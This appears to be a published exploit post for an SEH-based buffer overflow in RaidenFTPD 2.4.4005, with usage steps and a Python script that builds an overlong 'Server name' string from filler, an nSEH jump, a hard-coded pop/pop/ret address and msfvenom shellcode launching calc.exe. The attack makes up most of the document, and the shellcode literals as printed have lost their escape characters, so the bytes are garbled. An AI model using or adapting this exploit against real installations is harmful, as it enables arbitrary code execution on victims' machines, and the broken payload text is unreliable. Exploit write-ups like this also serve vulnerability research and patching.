Authored by Andre Nogueira

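RaidenFTPD version 2.4.4005 suffers from an SEH-based buffer overflow vulnerability, triggered by pasting an overlong string into the 'Server name' field of the step-by-step setup wizard.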

# Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)
# Date: 18/07/2023
# Exploit Author: Andre Nogueira
# Vendor Homepage: https://www.raidenftpd.com/en/
# Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe
# Version: RaidenFTPD 2.4.4005
# Tested on: Microsoft Windows 10 Build 19045

# 1.- Open RaidenFTPD
# 2.- Click on 'Setup' -> 'Step by step setup wizard'
# 3.- Run python code: exploit-raidenftpd.py
# 4.- Paste the content of exploit-raiden.txt into the field 'Server name'
# 5.- Click 'next' -> 'next' -> 'ok'
# 6.- Pop calc.exe


#!/usr/bin/env python3
from struct import pack

# Total size, in bytes, that the generated field content is padded out to
# (it sizes the trailing "D" filler appended to the buffer further down).
crash = 2000
# Number of "A" filler bytes written ahead of the nSEH/SEH values. The figure
# is tied to the tested build named in the header -- TODO confirm before
# reusing it in a regression test against another version.
offset = 497

# Demonstration payload: per the generator command recorded below, this is a
# windows/exec stage whose only action is to start calc.exe, i.e. a visible
# marker that control of execution was reached.
# NOTE(review): the literals are reproduced exactly as printed on this page;
# they look like hex-escaped bytes whose escape characters were lost in
# extraction, so do not derive byte-level detection signatures from this text.
# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v shellcode --b "x00x0d"
shellcode = b"x90" * 8
shellcode += b"xb8x9cx78x14x60xd9xc2xd9x74x24xf4"
shellcode += b"x5ax33xc9xb1x31x83xeaxfcx31x42x0f"
shellcode += b"x03x42x93x9axe1x9cx43xd8x0ax5dx93"
shellcode += b"xbdx83xb8xa2xfdxf0xc9x94xcdx73x9f"
shellcode += b"x18xa5xd6x34xabxcbxfex3bx1cx61xd9"
shellcode += b"x72x9dxdax19x14x1dx21x4exf6x1cxea"
shellcode += b"x83xf7x59x17x69xa5x32x53xdcx5ax37"
shellcode += b"x29xddxd1x0bxbfx65x05xdbxbex44x98"
shellcode += b"x50x99x46x1axb5x91xcex04xdax9cx99"
shellcode += b"xbfx28x6ax18x16x61x93xb7x57x4ex66"
shellcode += b"xc9x90x68x99xbcxe8x8bx24xc7x2exf6"
shellcode += b"xf2x42xb5x50x70xf4x11x61x55x63xd1"
shellcode += b"x6dx12xe7xbdx71xa5x24xb6x8dx2excb"
shellcode += b"x19x04x74xe8xbdx4dx2ex91xe4x2bx81"
shellcode += b"xaexf7x94x7ex0bx73x38x6ax26xdex56"
shellcode += b"x6dxb4x64x14x6dxc6x66x08x06xf7xed"
shellcode += b"xc7x51x08x24xacxaex42x65x84x26x0b"
shellcode += b"xffx95x2axacxd5xd9x52x2fxdcxa1xa0"
shellcode += b"x2fx95xa4xedxf7x45xd4x7ex92x69x4b"
shellcode += b"x7exb7x09x0axecx5bxe0xa9x94xfexfc"

# The two values written immediately after the "A" filler. By the author's
# note, nSEH holds a short relative jump intended to skip the handler pointer
# and land in the payload that follows it.
nSEH = b"xebx06x90x90" # short jump of 8 bytes
# SEH is a hard-coded address packed as a 32-bit little-endian value; the
# author attributes it to a pop/pop/ret sequence in msvcp70.dll.
# NOTE(review): a fixed handler address is only usable when that module loads
# at a predictable base and is not covered by SafeSEH -- presumably the case
# on the tested build; verify. SEHOP, and ASLR/SafeSEH-enabled builds of the
# bundled DLLs, are the hardening to check when assessing exposure.
SEH = pack("<L", 0x7c1e76ff) # pop eax; pop esi; ret; => msvcp70.dll

# Field content, in order: "A" filler of `offset` bytes, the nSEH/SEH pair,
# the demonstration payload, then "D" padding so the whole string reaches
# `crash` bytes (no padding is added if it is already that long).
buffer = b"".join([b"A" * offset, nSEH, SEH, shellcode])
buffer = buffer.ljust(crash, b"D")

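# Write the generated string to exploit-raiden.txt in binary mode. The context
# manager closes the handle even if the write raises, which the bare
# open()/close() pair did not guarantee. Messages and their order are unchanged.
with open("exploit-raiden.txt", 'wb') as file_payload:
    print("[*] Creating the .txt file for out payload")
    file_payload.write(buffer)
    print("[*] Writing malicious payload to the .txt file")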